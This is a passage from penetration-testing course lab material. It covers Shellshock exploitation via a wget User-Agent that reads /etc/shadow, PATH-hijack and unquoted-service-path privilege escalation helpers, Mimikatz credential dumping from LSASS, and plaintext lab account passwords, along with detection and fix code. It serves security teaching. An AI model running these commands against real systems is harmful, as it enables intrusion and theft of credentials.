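    for s in PRINTABLE.findall(data):
        words = s.decode("ascii").split()
        if words and words[0] in COMMON_TOOLS:
            found.add(words[0])
    return sorted(found)


def relative_commands(path: str) -> list:
    """Same check on a file; unreadable binaries yield an empty list."""
    try:
        with open(path, "rb") as fh:
            return relative_commands_in(fh.read())
    except OSError:
        return []


def report(root: str = "/usr/bin") -> dict:
    """Map each set-uid/set-gid binary under root to its PATH-hijack candidates."""
    out = {}
    for binary in find_suid_binaries(root):
        cmds = relative_commands(binary)
        if cmds:
            out[binary] = cmds
    return out


# Constructed sample image (not a real binary) containing one bare "ls" call
# and one absolute "/bin/cp" call.
SAMPLE_BINARY = (b"\x7fELF\x01\x01\x01\x00ls -la /tmp\x00/bin/cp /etc/shadow /tmp\x00"
                 b"usage: %s\x00  \x00")

if __name__ == "__main__":
    print("sample image calls via PATH:", relative_commands_in(SAMPLE_BINARY))
    for binary, cmds in report().items():
        print("%s calls %s via PATH" % (binary, ", ".join(cmds)))
```

The string scan is a heuristic: a program that builds the command at run time, or calls execvp() with the name in a separate string, will be missed, which is why the strace step above remains the authoritative check. Conversely, every hit reported here is worth confirming with strace before building the fake "ls".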
C) SHELLSHOCK exploit:
    wget -O - -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/shadow" http://127.0.0.1/cgi-bin/test.cgi
The User-Agent header is passed to the CGI script as the HTTP_USER_AGENT environment variable; a vulnerable
bash treats a value beginning with "() {" as a function definition and executes the command that follows the
closing brace. The two empty echo lines terminate the CGI response headers so that the command output is
returned as the response body.
In the lab, the Apache user www-data was added to the shadow group so that it can read the shadow file.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
Online check for Shellshock:
http://bashsmash.ccsir.org
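An added example (not from the course or the linked sites) covering both sides of the Shellshock exercise: it builds the same User-Agent as the wget line above, spots the "() {" signature in constructed access-log lines the way the 2014 IDS rules did, and probes the local bash with the canonical env-variable test so students can confirm the lab host is vulnerable and their own machine is not. The log lines and the target URL are constructed for illustration.

```python
"""Added example (not from the course): build the Shellshock (CVE-2014-6271)
User-Agent used above, detect such payloads in web server logs, and probe the
local bash the way the canonical one-liner does."""
import re
import shlex
import subprocess

# The bug: bash imported any environment variable whose value begins with
# "() {" as a function definition and kept executing whatever followed the
# closing brace.  Apache hands request headers to CGI scripts as environment
# variables (User-Agent becomes HTTP_USER_AGENT), so any header is a vector.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def shellshock_user_agent(cmd: str) -> str:
    """The two empty 'echo' lines end the CGI header block so Apache returns
    the command output as the response body instead of a 500 error."""
    return '() { :;}; echo "Content-type: text/plain"; echo; echo; ' + cmd


def wget_command(cmd: str, url: str) -> str:
    """Shell line equivalent to the exploit above (output to stdout)."""
    return shlex.join(["wget", "-O", "-", "-U", shellshock_user_agent(cmd), url])


def looks_like_shellshock(value: str) -> bool:
    """Detection rule: a literal "() {" in a header value.  Browsers never
    send it, so the false-positive rate is negligible."""
    return SHELLSHOCK_RE.search(value) is not None


def flag_log_lines(lines) -> list:
    """Indices of access-log lines carrying the pattern anywhere (User-Agent,
    Referer, Cookie: every header reaches the CGI environment)."""
    return [i for i, line in enumerate(lines) if looks_like_shellshock(line)]


def local_bash_vulnerable(bash: str = "bash"):
    """Canonical probe: a vulnerable bash prints 'vulnerable' when started
    with this environment.  Returns None if bash cannot be run."""
    env = {"x": "() { :;}; echo vulnerable",
           "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        proc = subprocess.run([bash, "-c", "echo test"], env=env,
                              capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.SubprocessError):
        return None
    return "vulnerable" in proc.stdout


# Constructed access-log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 12 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [24/Sep/2014:10:01:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 9 "-" "() { test;};echo; /bin/cat /etc/shadow"',
]

if __name__ == "__main__":
    print(wget_command("/bin/cat /etc/shadow", "http://127.0.0.1/cgi-bin/test.cgi"))
    print("flagged log lines:", flag_log_lines(SAMPLE_LOG))
    print("local bash vulnerable:", local_bash_vulnerable())
```

On the lab host, `local_bash_vulnerable()` returns True only when run there with its unpatched bash; a patched bash ignores the trailing command and the function returns False. The log check is what a defender would add to a SIEM rule after this exercise, and it also catches the same payload delivered through Referer or Cookie headers, which the wget line does not exercise.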

Working in pairs – This activity can also be used as a mock exam. It should take 1 hour maximum.

172.16.0.51 - PECB-win7.sys.lab
172.16.0.52 - PECB-DC.sys.lab

syslab\john.smith - Qazwsx12+1
syslab\jack.russell - Qazwsx12+1

---
Exploit - An old and vulnerable version of TFTPDWin is installed on PECB-Win7. Metasploit has a stable exploit
for it (search tftpdwin in msfconsole) that grants Administrator privileges.

Priv esc - Unquoted service binary path. A dummy service has been installed that runs with SYSTEM privileges
and uses an unquoted service binary path containing spaces, so Windows tries each space-delimited prefix of the
path as an executable before it reaches the real binary.
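An added example (not the lab's code) that works out, for any ImagePath string, which files Windows would try before the real service binary, checks which of those locations the current user could write to, and produces the quoted path that fixes the service. The service path used in the demonstration is a constructed stand-in for the lab's dummy service.

```python
"""Added example (not from the lab): derive the hijack candidates of an
unquoted service binary path, which is what the dummy SYSTEM service above
exposes, and show the corrected (quoted) path."""
import ntpath
import os


def split_image_path(image_path: str):
    """(program, arguments) for an unquoted ImagePath: the program part ends at
    the first ".exe", anything after it is the argument string."""
    end = image_path.lower().find(".exe")
    if end == -1:
        head, _, tail = image_path.partition(" ")
        return head, (" " + tail if tail else "")
    return image_path[:end + 4], image_path[end + 4:]


def hijack_candidates(image_path: str) -> list:
    """Paths the service control manager tries before the real binary when the
    ImagePath is unquoted and contains spaces.  Each space may end the program
    name, so "C:\\Program Files\\Dummy Svc\\svc.exe" is first looked up as
    "C:\\Program.exe", then "C:\\Program Files\\Dummy.exe".  A quoted path or
    one without spaces yields nothing."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    exe, _ = split_image_path(image_path)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def writable_candidates(image_path: str) -> list:
    """Candidates whose directory the current user can write to.  Meaningful on
    the target Windows host; elsewhere the directories simply do not exist."""
    return [c for c in hijack_candidates(image_path)
            if os.access(ntpath.dirname(c), os.W_OK)]


def quoted(image_path: str) -> str:
    """The fix: quote the program path and keep the arguments outside."""
    image_path = image_path.strip()
    if not hijack_candidates(image_path):
        return image_path
    exe, args = split_image_path(image_path)
    return '"%s"%s' % (exe, args)


# Constructed stand-in for the lab's dummy service (not the real ImagePath).
DUMMY_SERVICE = r"C:\Program Files\Dummy Svc\svc.exe -k dummy"

if __name__ == "__main__":
    for cand in hijack_candidates(DUMMY_SERVICE):
        print("Windows tries:", cand)
    print("writable here:", writable_candidates(DUMMY_SERVICE))
    print("fixed ImagePath:", quoted(DUMMY_SERVICE))
```

On the Win7 host the candidates are tried when the service starts, so the attack needs a restart (or a reboot) after dropping a payload at a writable candidate; the payload then runs as SYSTEM. The fix is the quoted path (set with sc config, binPath= taking the quoted string) together with making sure no directory along the path is writable by standard users.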

Mimikatz to get the plaintext domain password from memory:

To set this up - open \\PECB-DC and log in with syslab\jack.russell, so that the credentials are held in LSASS
memory on PECB-win7.

Launch mimikatz, then type privilege::debug followed by sekurlsa::logonpasswords.

https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150419a

privilege::debug asks for the debug privilege for the mimikatz process.

The debug privilege allows someone to debug a process that they would not otherwise have access to. For
example, a process running as a user with the debug privilege enabled on its token can debug a service running
as Local System.
from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx

    mimikatz # privilege::debug
    Privilege '20' OK

Remark: the error "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061" means that the required
privilege is not held by the client (mostly: you are not an administrator).

When working with the lsass process, mimikatz needs rights obtained in one of two ways:
•as Administrator, obtaining the debug privilege via privilege::debug;
•as the SYSTEM account (via post-exploitation tools, scheduled tasks, psexec -s, ...), in which case the debug
privilege is not needed.

Without rights to access the lsass process, all commands fail with an error like: ERROR
kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).
So do not hesitate to start with:

    mimikatz # privilege::debug
    Privilege '20' OK

    mimikatz # log sekurlsa.log
    Using 'sekurlsa.log' for logfile : OK

...before other commands.

We strive constantly to improve the quality and practical relevance of our training. Accordingly, your opinion of
the training you have just followed is of great value to us.

We would be very grateful if you could evaluate the following characteristics of the training and the instructors.

If you have suggestions for improving PECB's training materials, we would like to hear from you. We read and
evaluate the input we get from our members. Please open a ticket directed to the Training Department in the
Contact Us section of PECB's website.

In case of dissatisfaction with the training (trainer, training room, equipment, ...), the examination or the
certification process, please open a ticket under the “Make a complaint” category in the Contact Us section of
PECB's website.

After participating in this training, participants will receive a certificate of 31 CPD (Continuing Professional
Development) credits by e-mail.

As described during the course, there are many areas of penetration testing in which a professional can
specialise. PECB offers the following specialist Lead Penetration Tester courses:

Infrastructure Specialist: An Infrastructure Specialist focuses on testing the core elements of infrastructure
such as network devices, wireless, servers and cloud environments. This course gives the candidate a full
understanding of how to test infrastructure effectively using specialist techniques and tools, building on the
principles of the Certified Lead Pen Test Professional course.

Web Application Specialist: More and more applications are becoming web based and available online.
A web application penetration testing specialist is equipped with the skills to analyse a web application and
identify attack vectors and vulnerabilities. This course focuses on the techniques and skills needed to
understand and exploit web applications and includes a deep dive into the guidance of the Open Web
Application Security Project (OWASP).

Mobile Specialist: As organisations make ever greater use of mobile technologies and applications, including
smartphones and tablets, this course focuses on how to test the security of such devices and the applications
deployed on them. The course identifies the tools and techniques used to test and exploit such devices.

Social Engineering Specialist: Being able to gain access to information, targets and credentials without
technical hacking is a specialist skill in its own right. Social engineering features in most real-world
cybercrimes, whether in person, by telephone or by electronic means such as email or instant messaging. This
course teaches the psychological elements, the physical perimeter security and hardware tools, and the
techniques and skills used in social engineering, and how these can be used in a penetration test to understand
the vulnerabilities an organisation really faces.

Certified Lead Forensics Examiner (5 days)

The Certified Lead Forensics Examiner course allows a person to learn the basic skills employed by a
professional forensics examiner. The course covers the fundamentals of forensics, how to organise and lead a
forensics examination, and how to apply these techniques to a variety of technologies and environments. The
skills learned in this course are complementary to the Certified Lead Penetration Tester, as a skilled tester
usually has the skills and knowledge to conduct investigations into real security breaches.

Certified Risk Manager ISO 27005 (2 days)

The ISO 27005 “Certified Risk Manager” training allows a person to become proficient in the fundamental
elements of managing information-related risk: planning a risk management programme, risk analysis,
evaluation, treatment, communication and monitoring. Through readings, class exercises based on real cases,
discussions and demonstrations with risk modelling tools, the participant will be able to perform a sound risk
evaluation and to manage risks over time by understanding their lifecycle. Please note that this training aligns
with the framework of an ISO 27001 implementation process.

Page for Note Taking

Page for Note Taking
